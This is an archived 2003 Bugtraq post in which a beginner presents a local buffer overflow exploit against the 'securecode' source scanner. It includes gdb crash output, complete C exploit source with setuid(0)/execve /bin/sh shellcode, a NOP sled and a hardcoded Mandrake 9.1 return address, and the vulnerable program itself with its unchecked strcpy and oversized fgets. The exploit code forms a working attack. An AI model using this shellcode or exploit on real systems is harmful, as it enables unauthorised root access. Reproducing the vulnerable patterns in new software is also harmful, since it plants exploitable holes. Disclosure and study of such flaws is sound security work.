Hello ppl!! This is my debut on bugtraq!!
A few days ago someone posted a vulnerability in securecode.c (from
Tidbit^H^H^HTripBit) ...
Anyway I decided to code the exploit for learning purposes... (this is
my first exploit!!) Have fun!!
(note: you can't take over the world with this exploit....)
(Another note: I couldn't overwrite eip with the first strcpy... but I
could overwrite eax.... :\
I would really enjoy it if someone explained that to me!)
./securecode -s `perl -e 'print "A"x"2000"'`
gives me the following registers:
Program received signal SIGSEGV, Segmentation fault.
0x080485e5 in main ()
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x40154360 1075135328
edx 0x5050504 84215044
ebx 0x40155f50 1075142480
esp 0xbfffec50 0xbfffec50
ebp 0xbffff068 0xbffff068
esi 0x40012780 1073817472
edi 0xbffff0b4 -1073745740
eip 0x80485e5 0x80485e5
eflags 0x210286 2163334
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 8064
orig_eax 0xffffffff -1
Thank you for your help!!
In Memory of PoD (not the band or whatever)
PS: Sorry... I put TidBit instead of TripBit (man... I prolly offended
someone!!)
/* securecode-xp.c
*
* Vuln: securecode.c //Your know... the one from tidbit...
* Info: Program to check for vulns in source code...
* Vuln author: Someone else...
* Exploit author: Lucas G.
* Impact: it helped me learn... other than that, almost useless
*
* Compiling: gcc seccode.c -o seccode
* Usage: ./seccode
*
* Tips Make sure the securecode.c program is in the same directory AND
* has the same as I have it in the exploit ie:
*
* execl("./securecode", "securecode","-s","bigbuff", 0);
*
* Credits: teleh0r (for his wonderful tutorial bof4kids!
* teleh0r for his code that I modiffied.... (thought the
* code looked familiar?)
* Shell coder possibly by c0ntex
*
* */
#include <stdio.h>
/* kode ripped from kon2.c */
char codez[] =
/* setuid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\xcd\x80" /* int $0x80 */
/* setgid(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\xcd\x80" /* int $0x80 */
/* /bin/sh execve(); */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80" /* int $0x80 */
/* exit(0); */
"\x31\xdb" /* xor %ebx,%ebx */
"\x89\xd8" /* mov %ebx,%eax */
"\xb0\x01" /* mov $0x01,%al */
"\xcd\x80"; /* int $0x80 */
#define NOP 0x90
#define LEN 289
#define RET 0xbffff314 //Mandrake 9.1 offset
int main(int argc, char *argv[]) {
char buffer[LEN];
long retaddr, offset;
int i;
FILE *fp;
offset = 0;
if (argc > 1) {
offset = atol(argv[1]);
}
retaddr = RET + offset;
printf("\n Modified by j0e! Original code from:");
printf("\n- (c) teleh0rat_private anno 2000 -\n");
printf("Use : %s [offset] \n", argv[0]);
printf("Using: address 0x%lx\n\n", retaddr);
for (i = 0; i < LEN; i += 4)
*(long *) &buffer[i] = retaddr;
/*The greater the NUM of strlen(codez) - NUM, the more return addresses are
* put at the end (and less NOPS in the beggining*/
for (i = 0; i < (LEN - strlen(codez)-40); ++i)
*(buffer + i) = NOP;
memcpy(buffer + i, codez, (strlen(codez)));
fp = fopen("bigbuff", "w");
fprintf(fp, "%s",buffer);
fclose(fp);
execl("./securecode", "securecode","-s","bigbuff", 0);
return 0;
}
/*
* Secure Code Analizer v1.0
*
* Tripbit Security Development
* Author: posidron
* Website: tripbit.org
*
*
* ABOUT
*
* This tool scans your source code to different dangerous functions,
* like strcpy(), gets(), getenv(), sscanf() etc.
*
*
* OPTIONS
*
* [+] single source file -s [SOURCE_FILE]
*
*
* FEATURES
*
* [+] several source files -m [SOURCE_FILE, SOURCE_FILE ... ]
*
*
* GREETS
*
* #hackerboard, #csec, #tripbit
*
*/
#include <stdio.h>
#define FALSE 0
#define TRUE 1
int getopt(char *, char *);
int single_source(char *);
void help(char *);
void version();
int main(int argc, char *argv[])
{
int counter=3;
char buffer[1024];
if(argc == 1 || getopt(argv[1],"h") == TRUE ) { help(argv[0]); }
else if(getopt(argv[1],"v") == TRUE) { version(); }
else if(argc < 3) { help(argv[0]); }
strcpy(buffer,argv[2]);
printf("%s",buffer);
while(argv[counter]!=NULL)
{
strcat(buffer, " ");
strcat(buffer, argv[counter++]);
}
if(getopt(argv[1],"s") == TRUE)
single_source(buffer);
return 0;
}
int getopt(char *argument,char *option)
{
if( argument[0]=='-' && argument[1]==option[0] )
return TRUE;
return FALSE;
}
int single_source(char *buffer)
{
char puffer[256];
int counter = 1;
FILE *source_file;
source_file = fopen(buffer, "rt");
if(!source_file)
perror("Unable to open file!\n");
else
{
printf("File to open: %s\n\n", buffer);
printf("Please wait...\n\n");
while(fgets(puffer, 1044, source_file) != NULL)
{
if(strstr(puffer, "strcpy") != NULL)
{
printf("Line %d, strcpy() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: char * strcpy ( char * dest, const char * src );\n\n");
}
else if(strstr(puffer, "scanf") != NULL)
{
printf("Line %d, scanf() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: int scanf ( const char * format, ... );\n\n");
}
else if(strstr(puffer, "gets") != NULL)
{
printf("Line %d, gets() function was found!, potential buffer overflow attack!\n", counter);
printf(" Syntax: char * gets( char * str );\n\n");
}
else if(strstr(puffer, "fscanf") != NULL)
{
printf("Line %d, fscanf() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: int fscanf ( FILE * stream, const char * format, ... );\n\n");
}
else if(strstr(puffer, "fgets") != NULL)
{
printf("Line %d fgets() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: char * fgets ( char * str, int n, FILE * stream );\n\n");
}
else if(strstr(puffer, "setenv") != NULL)
{
printf("Line %d setenv() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: int setenv ( const char * name, const char * value, int overwrite );\n\n");
}
else if(strstr(puffer, "getenv") != NULL)
{
printf("Line %d getenv() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: char * getenv( const char * name );\n\n");
}
else if(strstr(puffer, "sscanf") != NULL)
{
printf("Line %d sscanf() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: int sscanf ( const char * str, const char * format, ... );\n\n");
}
else if(strstr(puffer, "strcat") != NULL)
{
printf("Line %d strcat() function was found, potential buffer overflow attack!\n", counter);
printf(" Syntax: char * strcat ( char * dest, const char * src );\n\n");
}
else if(strstr(puffer, "fprintf") != NULL)
{
printf("Line %d fprintf() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int fprintf ( FILE * stream, const char * format, ... );\n\n");
}
else if(strstr(puffer, "sprintf") != NULL)
{
printf("Line %d sprintf() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int sprintf ( char * str, const char * format, ... );\n\n");
}
else if(strstr(puffer, "snprintf") != NULL)
{
printf("Line %d snprintf() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int snprintf ( char *str, size_t n, const char * format, ... );\n\n");
}
else if(strstr(puffer, "system") != NULL)
{
printf("Line %d system() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int system ( const char * string );\n\n");
}
else if(strstr(puffer, "syslog") != NULL)
{
printf("Line %d syslog() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: void syslog ( int priority, const char * message, ...)\n\n");
}
else if(strstr(puffer, "vsprintf") != NULL)
{
printf("Line %d vsprintf() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int vsprintf ( const char * buf, const char * format, va_list ap);\n\n");
}
else if(strstr(puffer, "vsnprintf") != NULL)
{
printf("Line %d vsnprintf() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: int vsnprintf ( char * str, size_t n, const char * format, va_list ap);\n\n");
}
else if(strstr(puffer, "popen") != NULL)
{
printf("Line %d popen() function was found, potential formatstring attack!\n", counter);
printf(" Syntax: FILE* popen ( const char * command, const char * mode );\n\n");
}
counter++;
}
if(counter == 1) printf("Nothing was found!\n");
}
fclose(source_file);
printf("\nThe scan has finished!\n");
return 0;
}
void help(char *file_name)
{
printf("Usage: securecode [OPTION] [SPECIFICATION]\n");
printf("[+] single source file -s [SOURCE_FILE]\n");
exit(0);
}
void version()
{
printf("Secure Code Analizer [Version 1.0a] \n(C) Copyright 2003 Tripbit Security Development\n");
exit(0);
}
This archive was generated by hypermail 2b30 : Fri Jun 27 2003 - 11:15:30 PDT